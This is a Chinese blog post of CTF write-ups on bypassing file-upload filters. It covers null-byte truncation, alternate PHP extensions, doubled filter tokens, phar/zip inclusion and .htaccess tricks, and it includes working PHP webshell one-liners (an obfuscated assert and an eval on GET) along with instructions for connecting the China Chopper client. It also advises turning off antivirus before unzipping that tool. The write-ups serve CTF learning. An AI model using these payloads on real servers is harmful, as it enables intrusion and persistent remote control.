截断上传 CTF

题目:上传绕过

介绍:http://teamxlc.sinaapp.com/web5/21232f297a57a5a743894a0e4a801fc3/index.html

1,我们打开链接,是个上传题,我们先随便上传点东西,提示   不被允许的文件类型,仅支持上传jpg,gif,png后缀的文件   ,然后我们上传一张图片后缀是.png,结果显示     必须上传成后缀名为php的文件才行啊!  ,现在我们上传php文件,结果显示     不被允许的文件类型,仅支持上传jpg,gif,png后缀的文件。

2,这里我们应该怎么办呢,接下来我们截断上传,我们打开burp suite ,上传一个png文件,使之上传成功,我们会抓到上传的路径,我们在抓到的路径uploads/ 后面加个空格,然后在Hex出把20改成00(当程序输出包含chr(0)变量时,chr(0)后面的数据会被截断,后面的数据直接忽略,导致漏洞产生。在/Upload/后面加一个空格,点开hex,将其对应的20改成00,就可以绕过后缀名的过滤),如下图所示

3,完成上面的之后点击Forword,我们看浏览器页面,可以看见flag。(想要了解更多参考http://www.cnblogs.com/hack0ne/p/4603144.html)

 

 

 

 

题目:上传1

介绍:这是极客里面的上传题,不过现在已经平台关闭了,没办法给你们截图了。

1、

题目设有两句引导语:

echo ‘This type of file is forbidden’;      echo ‘You are closer to the answer’;

这两句可以推测出,这里是想让你用PHP文件的多种后缀名(php3,php4,phtml 等)来绕过

上传phtml后缀的文件后,就拿到了第一个flag。

 

 

 

题目:上传2

介绍:这是上传1的延伸.这个题可以有两种办法来解。我都列出来。

一、这是三叶草官方发布的:

根据你上传文件输出的内容,可以看出是过滤了哪个字符

$array=array(‘<?’,’?>’,’php’);

这里由于我的失误,在随后的过滤中只过滤了一次,也就是说你可以双写上述字符进行绕过,但是有些同学给的payload仅双写了某个字符(比如仅仅双写了”<?”),这样是不可以的

在修正了我的错误后,过滤规则没变,只不过会过滤到直到没有上面的三个元素,遂上面的方式失效了

但是,可以使用PHP语言的短标签(php.ini中的short_open_tag=on)来绕过:

<script language='php'>phpinfo();</script>

加上php被过滤,因此转换下大小写即可:
例如:

<script language='pHp'>phpinfo();</script>


二、另一种办法是连菜刀

1、我们上传的时候还是上传 xxx.phtml,不过里面的内容要写成下面的东西,下面写的,过滤了好多东西。
<script language="pHp">$k="ass"."ert"; $k(${"_PO"."ST"} ['8']);</script>
上传成功之后就连菜刀就行了(没有的可以私聊我qq:483058235,也可以留言我每天都会看一下博客,或者自己百度下载,我的也是百度下载的,
记得解压的时候要把电脑里面的所有的杀毒软件(360,电脑管家等等)都关掉),这里我演示一下连菜刀的图片给你们,以后连菜刀的我就不演示了。,
首先打开菜刀,然后输入地址,也就是你上传成功的路径,然后在后面那个小框里面输入你POST的东西,
比如上面的${"_PO"."ST"} ['8'])
,这个就是在小框里输入8 然后改下下面的脚本类型,添加就OK了,然后再看里面的东西,会有flag.
ps:自己可以搜一下一句话,这里有好多类型的php,asp等等......







题目:上传
介绍:这是刚刚结束的HCTF的上传题目,地址:http://pics.hctf.io/home.php?key=hduisa123,你们没有账号估计进不去,没事我给截图。
1,这是 zip协议包含文件 不懂的可以百度一下,首先我们可以看到页面,

2,我们先测试一下,很简单的,我们先创建一个php文件,里面输入<?php echo phpinfo(); ?>就行了,接下来我们把php文件压缩成zip文件,

之前测试可以知道只支持上传png文件,所以我们把zip文件改成png,(1.php→压缩→1.zip→重命名→1.png→上传)

这样就会上传成功了,记住文件上传成功的路径,接下来我们在原来的页面测试一下是不是上传成功,

输入?fp=phar://uploads/d6c97df8f7e9453739248070e0ef29edbbab7d5d.png/1111    
这里的phar是读zip文件的,这里的1111是你上传的png的文件名,每个人上传的路径都是不一样的,不要直接拿我的试。

因为你刚开始压缩的是1111.php文件,这里的1111的后面不用加.php了,因为fp把本地文件包含进来的时候已经加了.php了。

下面我们看截图

3,可以看到我们测试成功,接下来你们就可以重新上传一句话,然后和上面上传一样,上传成功之后连菜刀,flag就出来了。

 

 

 

 

题目:.htaccess 文件上传  漏洞

有的上传是只允许jpg,png......不允许php,asp,aspx,jsp等上传,但是这里讲到的htaccess文件上传是利用一个上传的一个疏忽。

.htaccess 是apache服务器中的一个配置文件,不是上传的文件的黑名单之内,因此可以上传成功。

.htaccess文件中定义了将上传的文件后缀名为 .jpg 格式的文件以 php 格式来解析文件。

上传.htaccess文件的内容为:

<IfModule>

AddType application/x-http-php .jpg 

</IfModule>

  (上传的jpg 均以php执行,同样png,html,txt都是一样的)

把.htaccess 上传后,且上传成功后,再上传内容为一句话的jpg文件

jpg文件内容:<?php @eval($_GET["orange"]); ?>

查看上传成功的路径,可以执行php语句。进而getshell。

 

 

 

 

 

任重而道远!

 

posted on 2016-12-01 00:59  Oran9e  阅读(5576)  评论(0编辑  收藏  举报